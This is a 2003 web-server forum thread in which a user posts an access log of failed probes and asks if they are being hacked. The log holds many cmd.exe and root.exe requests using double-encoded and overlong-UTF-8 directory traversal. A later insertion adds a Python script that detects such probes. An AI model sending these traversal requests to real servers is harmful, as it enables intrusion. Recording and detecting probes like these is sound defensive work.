Check my access log please! Am I being hacked?

 
Vitalichka
-


Joined: 25 Jan 2003
Posts: 7

Posted: Sat Jan 25, 2003 11:22 pm    Post subject: Check my access log please! Am I being hacked?

I have a question, I looked at my access log, and noticed that I received 31 hits and 31 of those hits were both HTML hits and Error hits. And if you look at the access log, it looks like someone is trying to hack in. When I trace the IP, it comes out to an AT&T facility.
[b]here's the log.

12.254.161.22 - - [25/Jan/2003:12:45:33 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:37 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:37 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:38 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:42 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:45 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:47 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:45 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:46 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:49 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:50 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:55 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:05 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429

:?: [/b]
Back to top View user's profile Send private message
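A way to triage a log like the one posted above, as an added example that is not part of any post in this thread: it labels each request by what it targets and how the path is encoded, then reports per client whether the server rejected every probe (all requests in the posted log got 400 or 404) or answered one. The names `classify` and `triage` and the final sample line (documentation IP, status 200) are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# First four lines are copied from the log in the post above; the last line is
# constructed (documentation IP, 200 status) to show what a served probe looks like.
SAMPLE_LOG = """\
12.254.161.22 - - [25/Jan/2003:12:45:33 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
192.0.2.10 - - [25/Jan/2003:14:00:00 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 1024
"""

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')

def classify(target):
    """Label what makes a request target look like a Windows/IIS probe."""
    low = target.lower()
    labels = set()
    if "cmd.exe" in low or "root.exe" in low:
        labels.add("shell-binary")
    once = unquote(low, encoding="latin-1")
    if unquote(once, encoding="latin-1") != once:
        labels.add("double-encoded")  # a second decoding pass still changes the path
    if re.search(r"%c[01]%", low):
        labels.add("invalid-utf8")    # bytes C0/C1 never occur in valid UTF-8
    return labels

def triage(log_text):
    """Per client: number of probe requests and any the server did not reject."""
    report = defaultdict(lambda: {"probes": 0, "served": []})
    for line in log_text.splitlines():
        m = CLF.match(line.strip())
        if not m:
            continue
        host, target, status = m.group(1), m.group(2), int(m.group(3))
        if classify(target):
            report[host]["probes"] += 1
            if status < 400:  # 2xx/3xx: the probe was answered, investigate
                report[host]["served"].append(target)
    return dict(report)

if __name__ == "__main__":
    for host, info in triage(SAMPLE_LOG).items():
        verdict = "INVESTIGATE" if info["served"] else "rejected"
        print(host, info["probes"], "probes:", verdict)
```

An empty `served` list for a client means every probe from it was refused; any entry there is the request to look at first.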
tdkyo
-


Joined: 23 Dec 2002
Posts: 55

Posted: Sat Jan 25, 2003 11:25 pm

dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad...
Back to top View user's profile Send private message
Vitalichka
-


Joined: 25 Jan 2003
Posts: 7

Posted: Sat Jan 25, 2003 11:26 pm

I mean that's 56 hits 56 Error Hits and 56 HTML Hits.

And the IPs are from the same range.

Thank you
Back to top View user's profile Send private message
Vitalichka
-


Joined: 25 Jan 2003
Posts: 7

Posted: Sat Jan 25, 2003 11:28 pm

[quote="tdkyo"]dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad...[/quote]

Why would you say that?
Wouldn't it be a waste of time yelling at the incompetent technicians?
And also, I don't think you can run any kind of server through ATT service.
Back to top View user's profile Send private message
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

Posted: Sun Jan 26, 2003 1:51 am

Vitalichka,

Please read http://www.aprelium.com/forum/viewtopic.php?t=807 .
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
All times are GMT + 1 Hour